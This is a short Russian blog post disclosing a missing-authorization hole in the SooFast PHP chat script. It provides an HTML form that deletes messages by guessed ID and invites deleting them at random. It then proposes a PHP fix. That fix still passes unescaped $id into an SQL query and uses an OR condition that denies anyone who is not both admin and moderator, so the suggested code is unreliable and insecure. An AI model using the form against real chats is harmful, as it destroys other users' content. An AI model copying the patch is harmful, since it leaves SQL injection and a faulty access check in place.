Неприятная дыра в ЧАТе

Итак.Есть в ЧАТе SooFast небольшая и неприятная дыра.Суть её состоит в том,что можно удалять сообщения.Но вопрос – как это сделать?..Итак.Есть в ЧАТе SooFast небольшая и неприятная дыра.Суть её состоит в том,что можно удалять сообщения.Но вопрос – как это сделать?
А просто – идём в чат – смотрим на сообщения.Для удаления сообщения мы должны знать его ID,однако мы его не знаем.Ну будем наугад удалять все,которые встретим.Для этого открываем исходный код страницы и всё оттуда удаляем и вставляем следующий код:


<form action="" method=post>
  <input type=hidden value="delmess" name="action">
  <input type=hidden value="11" name="id">
  <input type=submit value="Удалить сообщение">
  </form>


Где число 11 – ID сообщения – так мы наугад будем удалять сообщения в чате…

Теперь как исправить?
А правится просто.Открываем messlist.php и ищем:


  mysql_query("delete from tb_chat where id='$id'");


И перед этим кодом добавляем:


$nameus=$_SESSION["username"];
  $row=mysql_fetch_array(mysql_query("SELECT user_status,chatmoder FROM tb_users WHERE username='$nameus'"));
  if($row["user_status"]!='admin' OR $row["chatmoder"]!='1')
  {
  echo "<font color=red><b><center>Вы не можете удалять сообщения.Вы не являетесь администратором или модератором проекта!</center></b></font>";
  exit;
  }


Тестируйте и проверяйте)Также с вас комменты…

Автор публикации

не в сети 9 лет

Alex

Комментарии: 0Публикации: 166Регистрация: 19-02-2011

Понравилась статья? Поделись в соц. сетях:

Похожие новости

Добавить комментарий

Авторизация
*
*
Регистрация
*
*
*
Генерация пароля